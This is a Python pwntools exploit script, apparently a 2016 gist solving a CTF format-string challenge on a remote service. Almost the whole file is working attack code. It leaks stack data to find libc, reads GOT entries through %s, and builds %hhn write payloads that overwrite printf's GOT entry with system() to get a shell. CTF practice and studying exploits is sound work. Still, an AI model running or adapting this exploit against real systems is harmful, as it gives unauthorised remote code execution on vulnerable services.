@vesim987
Created December 29, 2016 21:12
from pwn import *
# Connection parameters for the challenge service and the pwntools context
# that p64()/u64() below rely on (64-bit little-endian, Linux).
# The whole script is Python 2 (print statements, xrange, integer `/`).
host = '78.46.224.86'
port = 1337
context.os = 'linux'
context.arch = 'amd64'
# One shared connection; every helper below sends and receives on this tube.
# The underlying weakness is user input reaching printf as the *format*
# argument; the fixed 0x400000 base used later implies a non-PIE binary and
# a writable GOT (no full RELRO) — the mitigations that would defeat this.
p = remote(host, port)
def dump_stack(at=None, n=2048):
    """Leak stack contents through the format-string bug and parse them.

    Builds a format string of `n // 8` pointer conversions — positional
    `%<k>$p` starting at argument index `at` when `at` is given, otherwise
    plain `.%p` repeats — sends it, and converts the printed values back
    to integers.

    Returns the parsed values (Python 2 `map`, i.e. a list of ints), one
    per conversion except the first field of the reply, which is dropped;
    `(nil)` becomes 0.
    """
    pl = ""
    if at:
        for i in range(n // 8):
            pl += "%{}$p.".format(at + i)
    else:
        pl = ".%p" * (n // 8)
    # Sentinel so the reply can be cut off regardless of its length.
    pl += "END"
    p.sendline(pl)
    # Strip the 3-byte "END" marker, then surrounding whitespace and dots.
    x = p.readuntil("END")[:-3].strip().strip(".")
    # NOTE(review): `[1:]` discards the first dot-separated field in both
    # branches (in the positional branch that is the `%<at>$p` value itself,
    # unless the service prefixes its reply with other text) — confirm the
    # callers' indices were chosen with this in mind.
    stack_leak = x.split(".")[1:]
    stack_leak = map(lambda y: 0 if "nil" in y else int(y, 16), stack_leak)
    return stack_leak
def fmtleaker(addr):
    """Read the bytes stored at `addr` in the remote process via `%8$s`.

    The 8-byte little-endian `addr` is appended after the marker text, so
    `%8$s` dereferences it and prints the bytes up to the first NUL; the
    text between "AAAA" and ".ENDBBBB" in the reply is the result.

    Returns that str, a single NUL byte when the string at `addr` is empty
    (i.e. the first byte there is 0), or None when the service sent nothing,
    every attempt raised, or the payload contains a newline (sendline would
    truncate it). Exceptions are retried up to 3 times; EOF is logged at
    debug level, anything else as a warning. `sys` comes from the
    `from pwn import *` star import.
    """
    log.debug("leaking addr 0x{:x}".format(addr))
    # Leftover from a per-attempt connection (see the commented line below);
    # always None here, so the `finally` block is effectively a no-op.
    vp = None
    for i in range(3):
        try:
            #vp = remote(host, port)
            pl = "AAAA%8$s.ENDBBBB"
            pl += p64(addr)
            if "\n" in pl:
                log.warning("newline in payload!")
                return None
            p.sendline(pl)
            x = p.recv(1024)
            if x:
                f = x.find("AAAA") + 4
                l = x.find(".ENDBBBB")
                res = x[f:l]
                if res == "":
                    return "\x00"
                else:
                    return res
            # Empty reply: give up without retrying.
            return None
        except KeyboardInterrupt:
            raise
        except EOFError:
            log.debug("got EOF for leaking addr 0x{:x}".format(addr))
            pass
        except Exception:
            log.warning("got exception...", exc_info=sys.exc_info())
        finally:
            if vp:
                vp.close()
    return None
def print_got():
    """Print the first three 8-byte GOT entries starting at bin_got_addr.

    Each entry is reassembled byte by byte with fmtleaker(): a `%s` read
    stops at the first NUL, so one call may return several bytes, and the
    next read starts right after them. A failed read is filled with 0xff
    so the loop still terminates. Uses the module-level bin_got_addr and the
    Python 2 print statement.
    """
    for off in range(3):
        leaked = ''
        while len(leaked) < 8:
            addr = bin_got_addr + len(leaked)
            x = fmtleaker(addr+off*8)
            if x:
                leaked += x
            else:
                leaked += "\xff"
        #log.info(hexdump(leaked))
        # fmtleaker may return more than the missing bytes; keep exactly 8.
        print hex(bin_got_addr+off*8) + ": " + hex(u64(leaked[:8]))
# Fixed (non-PIE) binary base and the GOT derived from it; printf's slot is
# the one overwritten at the end of the script.
bin_addr = 0x400000
bin_got_addr = bin_addr + 0x201000
printf_got = bin_got_addr + 0x18
# Offsets for the challenge's libc build. Only __libc_start_main_ret,
# system, str_bin_sh and puts are used below; the rest are unused here.
offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0
offset_dup2 = 0x00000000000f8380
offset_read = 0x00000000000f7c60
offset_write = 0x00000000000f7cc0
offset_str_bin_sh = 0x189fc0
offset_puts = 0x0000000000070960
# Format-string argument index of the stack slot holding the return address
# into __libc_start_main. n=16 requests two `%p` values; dump_stack drops the
# first parsed field, so `stack[0]` is the second one — presumably the index
# was tuned with that behaviour in mind (TODO confirm).
libc_index = 37
stack = dump_stack(libc_index, 16)
libc_stack = stack[0]
libc_address = libc_stack - offset___libc_start_main_ret
libc_bin_sh = libc_address + offset_str_bin_sh
libc_system = libc_address + offset_system
libc_puts = libc_address + offset_puts
log.info("libc_address: " + hex(libc_address))
# Reading back the "/bin/sh" string doubles as a sanity check of the base.
log.info("libc_bin_sh: {}({})".format(hex(libc_bin_sh), fmtleaker(libc_bin_sh)))
log.info("libc_system: " + hex(libc_system))
log.info("bin_got_addr: " + hex(bin_got_addr))
log.info("printf_got: " + hex(printf_got))
log.info("got befor:")
print_got()
# Presumably the first positional argument index that maps onto the sent
# buffer; passed to PayloadGenerator as its base index — verify if reused.
buffer_start = 6
class PayloadGenerator:
    """Build a format-string payload that writes one byte per `%hhn`.

    `write()` records (address, byte) pairs. `gen()` sorts them by byte
    value, emits padding so the running output count equals each byte value
    just before the matching `%<k>$hhn`, and appends the target addresses
    after the format text so the positional indices refer to them. `index`
    is the argument index at which the payload buffer itself starts.
    Both `payload_len()` and `gen()` sort `self.mem` in place.
    Python 2 code (xrange, integer `/`).
    """
    def __init__(self, index=0):
        # (address, byte) pairs to write, in insertion order until sorted.
        self.mem = []
        self.index = index
    def write(self, where, what):
        # Only the low 5 bytes of `what` are recorded — sufficient for a
        # user-space address, and fewer writes than a full 8-byte value.
        for i in xrange(5):
            self.mem.append((where + i, (int(what) >> (i * 8)) & 0xFF))
    def payload_len(self):
        """Return the length of the format text, padded to a multiple of 8.

        Mirrors the construction in gen() with a placeholder positional
        index, so the text length is known before the real index (which
        depends on this length) is. Assumes the real indices have the same
        number of digits as the placeholder — otherwise the lengths differ.
        """
        mem = self.mem
        payload = ''
        mem.sort(key=operator.itemgetter(1))
        printed = 0
        index = 10  # placeholder positional index; only its digit count matters
        for addr, value in mem:
            if value != printed:
                # Large gaps are cheaper as a precision-padded `%x`; small
                # ones as literal filler characters.
                if value - printed > 8:
                    payload += "%." + str(value - printed) + "x"
                else:
                    payload += "A" * (value - printed)
                printed = value
            payload += "%" + str(index + self.index) + "$hhn"
            index += 1
        # Align to 8 bytes so the appended addresses land on argument slots
        # (always adds 1..8 characters).
        payload += "A" * (8 - (len(payload) % 8))
        return len(payload)
    def gen(self):
        """Return the complete payload: format text followed by the addresses.

        The first positional index is the number of 8-byte slots occupied by
        the format text itself, offset by `self.index`.
        """
        mem = self.mem
        payload = ''
        mem.sort(key=operator.itemgetter(1))
        printed = 0
        index = self.payload_len() / 8
        for addr, value in mem:
            if value != printed:
                if value - printed > 8:
                    payload += "%." + str(value - printed) + "x"
                else:
                    payload += "A" * (value - printed)
                printed = value
            payload += "%" + str(index + self.index) + "$hhn"
            index += 1
        payload += "A" * (8 - (len(payload) % 8))
        # Addresses in the same (sorted) order as the `%hhn` conversions.
        for addr, value in mem:
            payload += p64(addr)
        return payload
# Point the printf GOT entry at the computed system address, then hand the
# connection over to the user.
gen = PayloadGenerator(buffer_start)
gen.write(printf_got, libc_system)
payload = gen.gen()
print hexdump(payload, width=8)
p.sendline(payload)
print p.recv(1024)
p.interactive()
# Only reached once the interactive session is closed.
log.info("got after: ")
print_got()